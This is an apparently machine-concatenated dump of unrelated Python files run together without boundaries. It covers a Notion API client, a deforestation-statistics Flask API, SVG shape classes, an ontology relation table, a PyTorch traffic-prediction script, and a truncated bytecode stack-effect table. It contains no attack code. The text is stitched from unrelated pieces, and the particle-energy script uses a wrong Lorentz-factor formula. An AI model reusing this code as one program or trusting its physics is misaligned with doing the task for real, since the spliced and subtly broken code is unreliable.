RequestTimeoutError() except httpx.HTTPStatusError as error: body = error.response.json() code = body.get("code") if code and is_api_error_code(code): raise APIResponseError(response, body["message"], code) raise HTTPResponseError(error.response) body = response.json() self.logger.debug(f"=> {body}") return body @abstractclassmethod def request( self, path: str, method: str, query: Optional[Dict[Any, Any]] = None, body: Optional[Dict[Any, Any]] = None, auth: Optional[str] = None, ) -> SyncAsync[Any]: # noqa pass class Client(BaseClient): """Synchronous client for Notion's API.""" client: httpx.Client def __init__( self, options: Optional[Union[Dict[Any, Any], ClientOptions]] = None, client: Optional[httpx.Client] = None, **kwargs: Any, ) -> None: if client is None: client = httpx.Client() super().__init__(client, options, **kwargs) def __enter__(self) -> "Client": self.client = httpx.Client() self.client.__enter__() return self def __exit__( self, exc_type: Type[BaseException], exc_value: BaseException, traceback: TracebackType, ) -> None: self.client.__exit__(exc_type, exc_value, traceback) del self._clients[-1] def close(self) -> None: """Close the connection pool of the current inner client.""" self.client.close() def request( self, path: str, method: str, query: Optional[Dict[Any, Any]] = None, body: Optional[Dict[Any, Any]] = None, auth: Optional[str] = None, ) -> Any: """Send an HTTP request.""" request = self._build_request(method, path, query, body, auth) response = self.client.send(request) return self._parse_response(response) class AsyncClient(BaseClient): """Asynchronous client for Notion's API.""" client: httpx.AsyncClient def __init__( self, options: Optional[Union[Dict[str, Any], ClientOptions]] = None, client: Optional[httpx.AsyncClient] = None, **kwargs: Any, ) -> None: if client is None: client = httpx.AsyncClient() super().__init__(client, options, **kwargs) async def __aenter__(self) -> "AsyncClient": self.client = httpx.AsyncClient() await self.client.__aenter__() return self async def __aexit__( self, exc_type: Type[BaseException], exc_value: BaseException, traceback: TracebackType, ) -> None: await self.client.__aexit__(exc_type, exc_value, traceback) del self._clients[-1] async def aclose(self) -> None: """Close the connection pool of the current inner client.""" await self.client.aclose() async def request( self, path: str, method: str, query: Optional[Dict[Any, Any]] = None, body: Optional[Dict[Any, Any]] = None, auth: Optional[str] = None, ) -> Any: """Send an HTTP request asynchronously.""" request = self._build_request(method, path, query, body, auth) response = await self.client.send(request) return self._parse_response(response) ImazonSadGoogle/DeforestationAnalysisTool #encoding: utf-8 import time import csv from datetime import datetime, timedelta, date import random import logging import simplejson as json from StringIO import StringIO from time_utils import timestamp, first_of_current_month, past_month_range from dateutil.parser import parse from google.appengine.ext.db import Key from flask import jsonify, request, abort, Response from app import app import settings from report_types import ReportType, CSVReportType, KMLReportType from kml import path_to_kml from models import Area, Note, Report, StatsStore, FustionTablesNames from ee import NDFI, EELandsat, Stats from resources.report import ReportAPI, CellAPI, NDFIMapApi, PolygonAPI, NoteAPI, UserAPI from resources.stats import RegionStatsAPI from application.constants import amazon_bounds ReportAPI.add_urls(app, '/api/v0/report') ReportAPI.add_custom_url(app, '/api/v0/report//close', 'close', ("POST",)) CellAPI.add_urls(app, '/api/v0/report//cell') CellAPI.add_custom_url(app, '/api/v0/report//cell//children', 'children') CellAPI.add_custom_url(app, '/api/v0/report//cell//ndfi_change', 'ndfi_change') CellAPI.add_custom_url(app, '/api/v0/report//cell//bounds', 'bounds') CellAPI.add_custom_url(app, '/api/v0/report//cell//landsat', 'landsat') CellAPI.add_custom_url(app, '/api/v0/report//cell//rgb///', 'rgb_mapid') NDFIMapApi.add_urls(app, '/api/v0/report//map') PolygonAPI.add_urls(app, '/api/v0/report//cell//polygon') NoteAPI.add_urls(app, '/api/v0/report//cell//note') UserAPI.add_urls(app, '/api/v0/user') RegionStatsAPI.add_urls(app, '/api/v0/report//stats') RegionStatsAPI.add_custom_url(app, '/api/v0/stats/polygon', 'polygon', methods=('POST',)) #TODO: this function needs a huge refactor @app.route('/api/v0/stats///') @app.route('/api/v0/stats/
    /') @app.route('/api/v0/stats/
    ') def stats(table, zone=None, format="csv"): reports = request.args.get('reports', None) if not reports: abort(400) try: reports = map(int, reports.split(',')) except ValueError: logging.error("bad format for report id") abort(400) this_report = ReportType.factory(format) this_report.init(zone) this_report.write_header() logging.info("table id is %s ", table) logging.info("and we see %s ", FustionTablesNames.all().filter('table_id =', table).fetch(1)) logging.info("and zone %s ", zone) logging.info("and format %s ", format) reports = [Report.get_by_id(x) for x in reports] for r in reports: if not r: logging.error("report not found") abort(404) stats = this_report.get_stats(r, table) for s in stats: this_report.write_row(r, s, table) this_report.write_footer() return this_report.response("report_%s" % table) @app.route('/api/v0/stats/polygon/') def polygon_stats(format=None): reports = request.args.get('reports', None) if not reports: abort(400) try: reports = map(int, reports.split(',')) except ValueError: logging.error("bad format for report id") abort(400) try: reports = [Report.get_by_id(x) for x in reports] except ValueError: logging.error("can't find some report") abort(404) #TODO: test if polygon is ccw # exchange lat, lon -> lon, lat polygon = json.loads(request.args.get('polygon', None)) polygon.append(polygon[0]) if not polygon: abort(404) ee = Stats() normalized_poly = [(coord[1], coord[0]) for coord in polygon] stats = ee.get_stats_for_polygon([(str(r.key().id()), r.assetid) for r in reports], [normalized_poly]) this_report = ReportType.factory(format) this_report.init("custom polygon") try: this_report.write_header() for i,s in enumerate(stats): r = reports[i] this_report.write_row(r, s, None, path_to_kml([polygon])) this_report.write_footer() return this_report.response("report_polygon") except (KeyError, ValueError, IndexError): abort(404) def landstat(): e = EELandsat('LANDSAT/L7_L1T') #return jsonify(images=e.list()) return jsonify(map=e.mapid()) @app.route('/api/v0/test') def testing(): """ r = Report.current() #r = Report.get(Key('')) logging.info("report " + unicode(r)) ee_resource = 'MOD09GA' s = Stats() polygon = [[[-61.9,-11.799],[-61.9,-11.9],[-61.799,-11.9],[-61.799,-11.799],[-61.9,-11.799]]] return str(s.get_stats_for_polygon("PRODES_2009", polygon)) #return str(ndfi.mapid2()) #return str(ndfi.freeze_map(1089491, r.key().id())) """ s = Stats() return jsonify(s._execute_cmd("/value", { "image": json.dumps({"creator":"SAD/com.google.earthengine.examples.sad.GetStatsList","args":[ [{"creator":"SAD/com.google.earthengine.examples.sad.ProdesImage","args":["PRODES_2009"]}, {"creator":"SAD/com.google.earthengine.examples.sad.ProdesImage","args":["PRODES_IMAZON_2011a"]}],{"type":"FeatureCollection","table_id":1505198},"name"]}), "fields": "classHistogram"})) import sys import json import argparse import logging from .tool import ToolBase, ToolHelper logger = logging.getLogger(__name__) class Register(ToolBase): name = 'register' desc = 'Register external asd tools package' def register(self, parser): parser.add_argument('name', help = 'The name of the python package') def process(self, args): ToolHelper.register_external_tools_module(args.name) print 'Tools registered successfully' import sys ''' The zodbpickle.pickle module exposes the standard behavior of the pickle module. This is backward compatible, but has the effect that by default, on Python3 you get the fast implementation, while on Python2 you get the slow implementation. This module is a version that always exposes the fast implementation of pickling and avoids the need to explicitly touch internals. ''' ''' Note: We are intentionally using "import *" in this context. The imported modules define an __all__ variable, which contains all the names that it wants to export. So this is a rare case where 'import *' is exactly the right thing to do. ''' # pick up all names that the module defines if sys.version_info[0] >= 3: from .pickle_3 import * # do not share the globals with a slow version del sys.modules['zodbpickle.pickle_3'] else: from .pickle_2 import * # also make sure that we really have the fast version, although # python3 tries to import them by default from ._pickle import * del sys nairoukh-code/Python_Projectsmaze_solver/test_maze.py # test_maze from unittest import TestCase from maze_solver.maze import MazeSolver class TestMazeSolver(TestCase): def test_solve(self): test_maze = [ ['A', 'X', ' ', ' ', ' '], [' ', 'X', ' ', 'X', ' '], [' ', ' ', ' ', ' ', ' '], [' ', 'X', ' ', 'X', ' '], [' ', 'X', ' ', 'X', 'B'], ] maze_solver = MazeSolver(test_maze) self.assertEqual(maze_solver.solve(), "SSEEEESS")# -*- coding: utf-8 -*- ## THESE PROGRAMS ALLOW YOU TO CALCULATE ## THE ENERGY OF A LIQUID, PARTICULE ## AND MAYBE SOME OTHERS THINGS NOT CODED YET ##LICENSE : DO WHAT THE FUCK YOU WANT ## ./particle.py argv1 argv2 --> argv1: speed particle && argv2: particle's mass import sys,math args=len(sys.argv) if args != 3: print("There isn't enough or too much arguments.\ \nYou have to give exactly two arguments.\n\n\ The first argument is the speed of the particle\n\ And the second argument is the mass of the particle.\ \nExiting...") sys.exit() pass def lorentzian_factor(v, c): y=1/(((1-v*2)/(c*2))*0.5) return float(y) pass def impulsion(y,m,v): p=y*m*v return float(p) pass def energy_computing(m, c, p): m=math.pow(m, 2) cc=math.pow(c, 4) pp=math.pow(p, 2) c=math.pow(c, 2) EE=((m*cc)+pp*c) EE=float(EE) return EE pass v=float(sys.argv[1]) #v is the speed of the particle m=float(sys.argv[2]) #mass of the particle c=float(299792458) #Fiat lux! y=lorentzian_factor(v,c) y=float(y) print("The lorentzian factor is : " + str(y)) p=impulsion(y,m,v) print("The impulsion is : " + str(p)) energy=energy_computing(m,c,p) print("E²=" + str(energy) + "") print("Therefore, we have :\n\ E="+ str(math.sqrt(float(energy)))) sys.exit() from .model import load_model, Model, info def run(CONFIG): n_class = len(CONFIG['PERSONS']) + 1 info("Start Modelling Process..") model = Model(n_class) model.train_and_evaluate(CONFIG)from arc_to_cubic import arc_to_cubic import dataclasses import svg_meta from svg_path_iter import SVGPathIter @dataclasses.dataclass class Point: x: int = 0 y: int = 0 # Subset of https://www.w3.org/TR/SVG11/painting.html @dataclasses.dataclass class SVGShape: clip_path: str = '' fill: str = '' stroke: str = '' # https://www.w3.org/TR/SVG11/paths.html#PathElement # Iterable, returning each command in the path. @dataclasses.dataclass class SVGPath(SVGShape): d: str = '' def __init__(self, **kwargs): for name, value in kwargs.items(): setattr(self, name, value) def _add(self, path_snippet): if self.d: self.d += ' ' self.d += path_snippet def _add_cmd(self, cmd, *args): self._add(svg_meta.path_segment(cmd, *args)) def M(self, *args): self._add_cmd('M', *args) def m(self, *args): self._add_cmd('m', *args) def _arc(self, c, rx, ry, x, y, large_arc): self._add(svg_meta.path_segment(c, rx, ry, 0, large_arc, 1, x, y)) def A(self, rx, ry, x, y, large_arc=0): self._arc('A', rx, ry, x, y, large_arc) def a(self, rx, ry, x, y, large_arc=0): self._arc('a', rx, ry, x, y, large_arc) def H(self, *args): self._add_cmd('H', *args) def h(self, *args): self._add_cmd('h', *args) def V(self, *args): self._add_cmd('V', *args) def v(self, *args): self._add_cmd('v', *args) def L(self, *args): self._add_cmd('L', *args) def l(self, *args): self._add_cmd('L', *args) def end(self): self._add('z') def as_path(self) -> 'SVGPath': return self def element(self): return _data_to_el(self) def __iter__(self): return SVGPathIter(self.d, exploded=True) def walk(self, callback): """Walk path and call callback to build potentially new commands. def callback(curr_xy, cmd, args) -> sequence of (new_cmd, new_args) """ # https://www.w3.org/TR/SVG11/paths.html curr_pos = Point() new_cmds = [] # iteration gives us exploded commands for idx, (cmd, args) in enumerate(self): svg_meta.check_cmd(cmd, args) if idx == 0 and cmd == 'm': cmd = 'M' for (new_cmd, new_cmd_args) in callback(curr_pos, cmd, args): new_cmds.append((new_cmd, new_cmd_args)) # update current position x_coord_idxs, y_coord_idxs = svg_meta.cmd_coords(new_cmd) if new_cmd.isupper(): if x_coord_idxs: curr_pos.x = 0 if y_coord_idxs: curr_pos.y = 0 if x_coord_idxs: curr_pos.x += new_cmd_args[x_coord_idxs[-1]] if y_coord_idxs: curr_pos.y += new_cmd_args[y_coord_idxs[-1]] self.d = '' for cmd, args in new_cmds: self._add_cmd(cmd, *args) # TODO replace with a proper transform def move(self, dx, dy, inplace=False): """Returns a new path that is this one shifted.""" def move_callback(_, cmd, args): # Paths must start with an absolute moveto. Relative bits are ... relative. # Shift the absolute parts and call it a day. if cmd.islower(): return ((cmd, args),) x_coord_idxs, y_coord_idxs = svg_meta.cmd_coords(cmd) args = list(args) # we'd like to mutate 'em for x_coord_idx in x_coord_idxs: args[x_coord_idx] += dx for y_coord_idx in y_coord_idxs: args[y_coord_idx] += dy return ((cmd, args),) target = self if not inplace: target = SVGPath(d=self.d, clip_path=self.clip_path) target.walk(move_callback) return target def absolute(self, inplace=False): """Returns equivalent path with only absolute commands.""" def abs_callback(curr_pos, cmd, args): x_coord_idxs, y_coord_idxs = svg_meta.cmd_coords(cmd) if cmd.islower(): cmd = cmd.upper() args = list(args) # we'd like to mutate 'em for x_coord_idx in x_coord_idxs: args[x_coord_idx] += curr_pos.x for y_coord_idx in y_coord_idxs: args[y_coord_idx] += curr_pos.y return ((cmd, args),) target = self if not inplace: target = SVGPath(self.d, self.clip_path) target.walk(abs_callback) return target def explicit_lines(self, inplace=False): """Replace all vertical/horizontal lines with line to (x,y).""" def explicit_line_callback(curr_pos, cmd, args): if cmd == 'v': args = (0, args[0]) elif cmd == 'V': args = (curr_pos.x, args[0]) elif cmd == 'h': args = (args[0], 0) elif cmd == 'H': args = (args[0], curr_pos.y) else: return ((cmd, args),) # nothing changes if cmd.islower(): cmd = 'l' else: cmd = 'L' return ((cmd, args),) target = self if not inplace: target = SVGPath(d=self.d, clip_path=self.clip_path) target.walk(explicit_line_callback) return target def arcs_to_cubics(self, inplace=False): """Replace all arcs with similar cubics""" def arc_to_cubic_callback(curr_pos, cmd, args): if cmd not in {'a', 'A'}: # no work to do return ((cmd, args),) (rx, ry, x_rotation, large, sweep, end_x, end_y) = args start_pt = (curr_pos.x, curr_pos.y) if cmd == 'a': end_x += curr_pos[0] end_y += curr_pos[1] end_pt = (end_x, end_y) result = [] for p1, p2, target in arc_to_cubic(start_pt, rx, ry, x_rotation, large, sweep, end_pt): x1, y1 = p1.real, p1.imag x2, y2 = p2.real, p2.imag x, y = target.real, target.imag result.append(('C', (x1, y1, x2, y2, x, y))) return tuple(result) target = self if not inplace: target = SVGPath(d=self.d, clip_path=self.clip_path) target.walk(arc_to_cubic_callback) return target # https://www.w3.org/TR/SVG11/shapes.html#CircleElement @dataclasses.dataclass class SVGCircle: r: float cx: float = 0 cy: float = 0 clip_path: str = '' def as_path(self) -> SVGPath: return SVGEllipse(self.r, self.r, self.cx, self.cy, self.clip_path).as_path() def element(self): return _data_to_el(self) # https://www.w3.org/TR/SVG11/shapes.html#EllipseElement @dataclasses.dataclass class SVGEllipse: rx: float ry: float cx: float = 0 cy: float = 0 clip_path: str = '' def as_path(self) -> SVGPath: rx, ry, cx, cy, clip_path = dataclasses.astuple(self) path = SVGPath() # arc doesn't seem to like being a complete shape, draw two halves path.M(cx - rx, cy) path.A(rx, ry, cx + rx, cy, large_arc=1) path.A(rx, ry, cx - rx, cy, large_arc=1) path.clip_path = clip_path return path def element(self): return _data_to_el(self) # https://www.w3.org/TR/SVG11/shapes.html#LineElement @dataclasses.dataclass class SVGLine: x1: float = 0 y1: float = 0 x2: float = 0 y2: float = 0 clip_path: str = '' def as_path(self) -> SVGPath: x1, y1, x2, y2, clip_path = dataclasses.astuple(self) path = SVGPath() path.M(x1, y1) path.L(x2, y2) path.clip_path = clip_path return path def element(self): return _data_to_el(self) # https://www.w3.org/TR/SVG11/shapes.html#PolygonElement @dataclasses.dataclass class SVGPolygon: points: str clip_path: str = '' def as_path(self) -> SVGPath: if self.points: path = SVGPath(d='M' + self.points + ' z') else: path = SVGPath() path.clip_path = self.clip_path return path def element(self): return _data_to_el(self) # https://www.w3.org/TR/SVG11/shapes.html#PolylineElement @dataclasses.dataclass class SVGPolyline: points: str clip_path: str = '' def as_path(self) -> SVGPath: if self.points: return SVGPath(d='M' + self.points) return SVGPath() def element(self): return _data_to_el(self) # https://www.w3.org/TR/SVG11/shapes.html#RectElement @dataclasses.dataclass class SVGRect: x: float = 0 y: float = 0 width: float = 0 height: float = 0 rx: float = 0 ry: float = 0 clip_path: str = '' def __post_init__(self): if not self.rx: self.rx = self.ry if not self.ry: self.ry = self.rx self.rx = min(self.rx, self.width / 2) self.ry = min(self.ry, self.height / 2) def as_path(self) -> SVGPath: x, y, w, h, rx, ry, clip_path = dataclasses.astuple(self) path = SVGPath() path.M(x + rx, y) path.H(x + w - rx) if rx > 0: path.A(rx, ry, x + w, y + ry) path.V(y + h - ry) if rx > 0: path.A(rx, ry, x + w - rx, y + h) path.H(x + rx) if rx > 0: path.A(rx, ry, x, y + h - ry) path.V(y + ry) if rx > 0: path.A(rx, ry, x + rx, y) path.end() path.clip_path = clip_path return path def element(self): return _data_to_el(self) ontobio/rdfgen/relations.py __relation_label_lookup = { "occurs in": "http://purl.obolibrary.org/obo/BFO_0000066", "happens during": "http://purl.obolibrary.org/obo/RO_0002092", "has input": "http://purl.obolibrary.org/obo/RO_0002233", "results in specification of": "http://purl.obolibrary.org/obo/RO_0002356", "part of": "http://purl.obolibrary.org/obo/BFO_0000050", "has part": "http://purl.obolibrary.org/obo/BFO_0000051", "results in development of": "http://purl.obolibrary.org/obo/RO_0002296", "results in movement of": "http://purl.obolibrary.org/obo/RO_0002565", "occurs at": "http://purl.obolibrary.org/obo/GOREL_0000501", "stabilizes": "http://purl.obolibrary.org/obo/GOREL_0000018", "positively regulates": "http://purl.obolibrary.org/obo/RO_0002213", "regulates transport of": "http://purl.obolibrary.org/obo/RO_0002011", "regulates transcription of": "http://purl.obolibrary.org/obo/GOREL_0098788", "causally upstream of": "http://purl.obolibrary.org/obo/RO_0002411", "regulates activity of": "http://purl.obolibrary.org/obo/GOREL_0098702", "adjacent to": "http://purl.obolibrary.org/obo/RO_0002220", "results in acquisition of features of": "http://purl.obolibrary.org/obo/RO_0002315", "results in morphogenesis of": "http://purl.obolibrary.org/obo/RO_0002298", "results in maturation of": "http://purl.obolibrary.org/obo/RO_0002299", "has participant": "http://purl.obolibrary.org/obo/RO_0000057", "transports or maintains localization of": "http://purl.obolibrary.org/obo/RO_0002313", "negatively regulates": "http://purl.obolibrary.org/obo/RO_0002212", "regulates": "http://purl.obolibrary.org/obo/RO_0002211", "regulates expression of": "http://purl.obolibrary.org/obo/GOREL_0098789", "has target end location": "http://purl.obolibrary.org/obo/RO_0002339", "produced by": "http://purl.obolibrary.org/obo/RO_0003001", "has end location": "http://purl.obolibrary.org/obo/RO_0002232", "directly positively regulates": "http://purl.obolibrary.org/obo/RO_0002629", "has direct input": "http://purl.obolibrary.org/obo/GOREL_0000752", "enables": "http://purl.obolibrary.org/obo/RO_0002327", "enabled by": "http://purl.obolibrary.org/obo/RO_0002333", "involved in": "http://purl.obolibrary.org/obo/RO_0002331", "acts upstream of": "http://purl.obolibrary.org/obo/RO_0002263", "colocalizes with": "http://purl.obolibrary.org/obo/RO_0002325", "contributes to": "http://purl.obolibrary.org/obo/RO_0002326", "acts upstream of or within": "http://purl.obolibrary.org/obo/RO_0002264", "acts upstream of or within positive effect": "http://purl.obolibrary.org/obo/RO_0004032", "acts upstream of or within negative effect": "http://purl.obolibrary.org/obo/RO_0004033", "acts upstream of negative effect": "http://purl.obolibrary.org/obo/RO_0004035", "acts upstream of positive effect": "http://purl.obolibrary.org/obo/RO_0004034", "located in": "http://purl.obolibrary.org/obo/RO_0001025", "is active in": "http://purl.obolibrary.org/obo/RO_0002432", } def lookup_label(label, default=None): return __relation_label_lookup.get(label.replace("_", " "), default) def label_relation_lookup(): return __relation_label_lookup Radar.py0 import pandas as pd import numpy as np import torch import torch.nn as nn from torch.utils.data import Dataset,DataLoader import torch.nn.functional as F import matplotlib.pyplot as plt from sklearn.preprocessing import MinMaxScaler df = pd.read_csv("Radar_Traffic_Counts.csv") df_new = df.copy() #Sortby date to get logical predictions df_new = df_new.sort_values(by = ["Year", "Month", "Day", "Day of Week"]) #Transform object data to integer classes mappings = {} for i in range(df_new.shape[1]): if df_new.iloc[:,i].dtypes == 'O': labels_list=list(df_new.iloc[:,i].unique()) mapping = dict(zip(labels_list,range(len(labels_list)))) mappings[df_new.columns[i]] = (mapping) df_new.iloc[:,i] = df_new.iloc[:,i].map(mapping) #divide data into features and labels X = df_new.drop("Volume", axis = 1) y = df_new.Volume scaler = MinMaxScaler() scaler.fit(np.array(y).reshape(-1,1)) y_scaled = scaler.transform(np.array(y).reshape(-1,1)) scaler = MinMaxScaler() scaler.fit(X) X_scaled = scaler.transform(X) #take a small part of data to accelerate computation X = X_scaled[:20000, :] y = y_scaled[:20000] X_train, X_test = X[:16000], X[16000:] y_train, y_test = y[:16000], y[16000:] #create a dataset class class SelectDataset(Dataset): def __init__(self,feature,target): self.feature = feature self.target = target def __len__(self): return len(self.feature) def __getitem__(self,idx): item = self.feature[idx] label = self.target[idx] return item,label #transform datasets into Pytorch tensors X_train, X_test = torch.tensor(X_train), torch.tensor(X_test) y_train, y_test = torch.tensor(y_train), torch.tensor(y_test) batch_size = 10 test = SelectDataset(X_test,y_test) train = SelectDataset(X_train, y_train) train_loader = DataLoader(train, batch_size = batch_size,shuffle = False) test_loader = DataLoader(test, batch_size = batch_size, shuffle = False) #Define a neural network class NN(nn.Module): def __init__(self): super(NN,self).__init__() self.fc1 = nn.Linear(11,5) self.fc2 = nn.Linear(5,5) self.fc3 = nn.Linear(5,1) def forward(self,x): x = self.fc1(x) x = self.fc2(x) x = self.fc3(x) return x #Define the model and the loss function and the functions for training and testing device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") model = NN().to(device) optimizer = torch.optim.Adam(model.parameters(), lr=1e-5) criterion = nn.MSELoss() train_losses = [] def Train(): running_loss = .0 model.train() for idx, (inputs,labels) in enumerate(train_loader): inputs = inputs.to(device) labels = labels.float().to(device) optimizer.zero_grad() preds = model(inputs.float()) loss = criterion(preds,labels) loss.backward() optimizer.step() running_loss += loss train_loss = running_loss/len(train_loader) train_losses.append(train_loss.detach().cpu().numpy()) print(f'train_loss {train_loss}') test_losses = [] def Test(): running_loss = .0 model.eval() with torch.no_grad(): for idx, (inputs, labels) in enumerate(test_loader): inputs = inputs.to(device) labels = labels.to(device) optimizer.zero_grad() preds = model(inputs.float()) loss = criterion(preds,labels) running_loss += loss test_loss = running_loss/len(test_loader) test_losses.append(test_loss.detach().cpu().numpy()) print(f'test_loss {test_loss}') #Do 500 epochs and see how the loss changes epochs = 300 for epoch in range(epochs): print('epochs {}/{}'.format(epoch+1,epochs)) Train() Test() #Plot the losses fig, ax = plt.subplots() color = "tab:blue" ax.plot(range(len(train_losses)), train_losses, color = color, label = "train loss") color = "tab:red" ax.plot(range(len(test_losses)), test_losses, color = color, label = "test loss") legend = ax.legend(loc='upper right', shadow=True, fontsize='x-large') plt.show #Now we're going to change the MSE loss to the Huber Loss model1 = NN().to(device) optimizer = torch.optim.Adam(model1.parameters(), lr=1e-5) criterion = nn.SmoothL1Loss() train_losses_huber = [] def Train_huber(): running_loss = .0 model1.train() for idx, (inputs,labels) in enumerate(train_loader): inputs = inputs.to(device) labels = labels.float().to(device) optimizer.zero_grad() preds = model1(inputs.float()) loss = criterion(preds,labels) loss.backward() optimizer.step() running_loss += loss train_loss = running_loss/len(train_loader) train_losses_huber.append(train_loss.detach().cpu().numpy()) print(f'train_loss {train_loss}') test_losses_huber = [] def Test_huber(): running_loss = .0 model1.eval() with torch.no_grad(): for idx, (inputs, labels) in enumerate(test_loader): inputs = inputs.to(device) labels = labels.to(device) optimizer.zero_grad() preds = model1(inputs.float()) loss = criterion(preds,labels) running_loss += loss test_loss = running_loss/len(test_loader) test_losses_huber.append(test_loss.detach().cpu().numpy()) print(f'test_loss {test_loss}') #Do 100 epochs using this new loss epochs = 300 for epoch in range(epochs): print('epochs {}/{}'.format(epoch+1,epochs)) Train_huber() Test_huber() #Now we define a convolutional neural network class CNN(nn.Module): def __init__(self): super(CNN,self).__init__() self.conv1d = nn.Conv1d(1,32,kernel_size= 3, stride = 1) self.relu = nn.ReLU(inplace = True) self.maxpool = nn.MaxPool1d(3, stride=1) self.fc1 = nn.Linear(7 * 32,50) self.fc2 = nn.Linear(50,1) def forward(self,x): x = self.conv1d(x) x = self.relu(x) x = self.maxpool(x) x = x.view(10,-1) x = self.fc1(x) x = self.relu(x) x = F.dropout(x, training=self.training) x = self.fc2(x) return x model_CNN = CNN().to(device) optimizer = torch.optim.Adam(model_CNN.parameters(), lr=1e-5) criterion = nn.SmoothL1Loss() train_losses_CNN = [] def Train_CNN(): running_loss = .0 model_CNN.train() for idx, (inputs,labels) in enumerate(train_loader): inputs = inputs.view(-1,1,11) inputs = inputs.to(device) labels = labels.float().to(device) optimizer.zero_grad() preds = model_CNN(inputs.float()) loss = criterion(preds,labels) loss.backward() optimizer.step() running_loss += loss train_loss = running_loss/len(train_loader) train_losses_CNN.append(train_loss.detach().cpu().numpy()) print(f'train_loss {train_loss}') test_losses_CNN = [] def Test_CNN(): running_loss = .0 model_CNN.eval() with torch.no_grad(): for idx, (inputs, labels) in enumerate(test_loader): inputs = inputs.view(-1,1,11) inputs = inputs.to(device) labels = labels.to(device) optimizer.zero_grad() preds = model_CNN(inputs.float()) loss = criterion(preds,labels) running_loss += loss test_loss = running_loss/len(test_loader) test_losses_CNN.append(test_loss.detach().cpu().numpy()) print(f'test_loss {test_loss}') epochs = 300 for epoch in range(epochs): print('epochs {}/{}'.format(epoch+1,epochs)) Train_CNN() Test_CNN() #Plot the losses fig, ax = plt.subplots(figsize = (10,8)) color = "tab:blue" ax.plot(range(len(train_losses_CNN)), train_losses_CNN, color = color, label = "train loss") color = "tab:red" ax.plot(range(len(test_losses_CNN)), test_losses_CNN, color = color, label = "test loss") ax.set_xlabel("Epochs") ax.set_ylabel("Losses") legend = ax.legend(loc='upper right', shadow=True, fontsize='x-large') plt.show #RNN #Reshape the data to use for RNNs and build the dataloaders X_train, X_test = X[:16000], X[16000:] y_train, y_test = y[:16000], y[16000:] X_train, X_test = X_train.view(-1,2,11), X_test.view(-1, 2, 11) y_train, y_test = y_train.view(-1, 2), y_test.view(-1,2) batch_size = 10 test = SelectDataset(X_test,y_test) train = SelectDataset(X_train, y_train) train_loader = DataLoader(train, batch_size = batch_size,shuffle = False) test_loader = DataLoader(test, batch_size = batch_size, shuffle = False) #Building RNN class RNN(nn.Module): def __init__(self, input_dim, hidden_dim, layer_dim, output_dim): super(RNN, self).__init__() self.hidden_dim = hidden_dim #hidden layer dimension self.layer_dim = layer_dim #number of hidden layers self.rnn = nn.RNN(input_dim, hidden_dim, layer_dim, batch_first=True, nonlinearity='relu') self.fc = nn.Linear(hidden_dim, output_dim) def forward(self, x): # Initialize hidden state with zeros h0 = torch.zeros(self.layer_dim, x.size(0), self.hidden_dim).requires_grad_().cuda() x, hn = self.rnn(x, h0.detach()) x = self.fc(x[:, -1, :]) #just want last time step hidden states return x #Train and test our model #Model parameters input_dim = 11 hidden_dim = 100 layer_dim = 1 output_dim = 2 model_RNN = RNN(input_dim, hidden_dim, layer_dim, output_dim).to(device) optimizer = torch.optim.Adam(model_RNN.parameters(), lr=1e-5) criterion = nn.SmoothL1Loss() train_losses_RNN = [] def Train_RNN(): running_loss = .0 model_RNN.train() for idx, (inputs,labels) in enumerate(train_loader): inputs = inputs.to(device) labels = labels.float().to(device) optimizer.zero_grad() preds = model_RNN(inputs.float()) loss = criterion(preds,labels) loss.backward() optimizer.step() running_loss += loss train_loss = running_loss/len(train_loader) train_losses_RNN.append(train_loss.detach().cpu().numpy()) print(f'train_loss {train_loss}') test_losses_RNN = [] def Test_RNN(): running_loss = .0 model_RNN.eval() with torch.no_grad(): for idx, (inputs, labels) in enumerate(test_loader): inputs = inputs.to(device) labels = labels.to(device) optimizer.zero_grad() preds = model_RNN(inputs.float()) loss = criterion(preds,labels) running_loss += loss test_loss = running_loss/len(test_loader) test_losses_RNN.append(test_loss.detach().cpu().numpy()) print(f'test_loss {test_loss}') epochs = 300 for epoch in range(epochs): print('epochs {}/{}'.format(epoch+1,epochs)) Train_RNN() Test_RNN() #Plot the results fig, ax = plt.subplots(figsize = (10, 8)) color = "tab:blue" ax.plot(range(len(train_losses_RNN)), train_losses_RNN, color = color, label = "train loss") color = "tab:red" ax.plot(range(len(test_losses_RNN)), test_losses_RNN, color = color, label = "test loss") legend = ax.legend(loc='upper right', shadow=True, fontsize='x-large') ax.set_xlabel("Epochs") ax.set_ylabel("Losses") plt.show src/optimizer/decompiler.py from opcode import opname from types import CodeType from typing import List, Tuple, Union from structures import * def find_n_values_on_stack(codes: bytes, index: int) -> int: if "grow" not in dir(find_n_values_on_stack): find_n_values_on_stack.grow = { 135: lambda oparg: 1, 124: lambda oparg: 1, 100: lambda oparg: 1, 71: lambda oparg: 1, 92: lambda oparg: oparg - 1, 94: lambda oparg: (oparg & 0xFF == 0xFF) + (oparg >> 8), 101: lambda oparg: 1, 116: lambda oparg: 1, 148: lambda oparg: 1, 136: lambda oparg: 1, 109: lambda oparg: 1, 160: lambda oparg: 1, } if "shrink" not in dir(find_n_values_on_stack): find_n_values_on_stack.shrink = { 125: lambda oparg: 1, 1: lambda oparg: 1, 19: lambda oparg: 1, 20: lambda oparg: 1, 16: lambda oparg: 1, 27: lambda oparg: 1, 26: lambda oparg: 1, 22: lambda oparg: 1, 23: lambda oparg: 1, 24: lambda oparg: 1, 25: lambda oparg: 1, 62: lambda oparg: 1, 63: lambda oparg: 1, 64: lambda oparg: 1, 65: lambda oparg: 1, 66: lambda oparg: 1, 145: lambda oparg: 1, 146: lambda oparg: 1, 67: lambda oparg: 1, 57: lambda oparg: 1, 17: lambda oparg: 1, 29: lambda oparg: 1, 28: lambda oparg: 1, 59: lambda oparg: 1, 55: lambda oparg: 1, 56: lambda oparg: 1, 75: lambda oparg: 1, 76: lambda oparg: 1, 77: lambda oparg: 1, 78: lambda oparg: 1, 79: lambda oparg: 1, 70: lambda oparg: 1, 130: lambda oparg: oparg, 83: lambda oparg: 1, 72: lambda oparg: 1, 86: lambda oparg: 1, 89: lambda oparg: 3, 90: lambda oparg: 1, 95: lambda oparg: 2, 96: lambda oparg: 1, 97: lambda oparg: 1, 137: lambda oparg: 1, 157: lambda oparg: oparg - 1, 102: lambda oparg: oparg - 1, 103: lambda oparg: oparg - 1, 104: lambda oparg: oparg - 1, 105: lambda oparg: oparg * 2 - 1, 156: lambda oparg: oparg, 147: lambda oparg: 2, 107: lambda oparg: 1, 108: lambda oparg: 1, 84: lambda oparg: 1, 114: lambda 